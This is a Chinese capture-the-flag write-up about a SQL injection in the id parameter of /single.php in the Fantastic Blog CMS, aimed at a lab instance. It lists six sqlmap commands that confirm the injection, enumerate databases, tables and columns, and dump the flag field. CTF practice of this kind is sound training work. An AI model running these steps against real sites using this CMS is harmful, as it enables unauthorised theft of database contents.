靶标介绍:
Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。
根据题目提示,找到注入点
http://eci-2zedcqv70l1j4fp9hdfc./single.php?id=2
直接用sqlmap注入
1. 检查注入点:
sqlmap -u http://eci-2zedcqv70l1j4fp9hdfc./single.php?id=2
2. 爆所有数据库信息:
sqlmap -u http://eci-2zedcqv70l1j4fp9hdfc./single.php?id=2 --dbs
3. 爆当前数据库信息:
sqlmap -u http://eci-2zedcqv70l1j4fp9hdfc./single.php?id=2 --current-db
4. 指定库名列出所有表
sqlmap -u http://eci-2zedcqv70l1j4fp9hdfc./single.php?id=2 -D ctf --tables
'ctf' 为指定数据库名称
5. 指定库名表名列出所有字段
sqlmap -u http://eci-2zedcqv70l1j4fp9hdfc./single.php?id=2 -D ctf -T flag --columns
'flag' 为指定表名称
6. 指定库名表名字段dump出指定字段
sqlmap -u http://eci-2zedcqv70l1j4fp9hdfc./single.php?id=2 -D ctf -T flag -C flag --dump
'flag' 为指定字段名称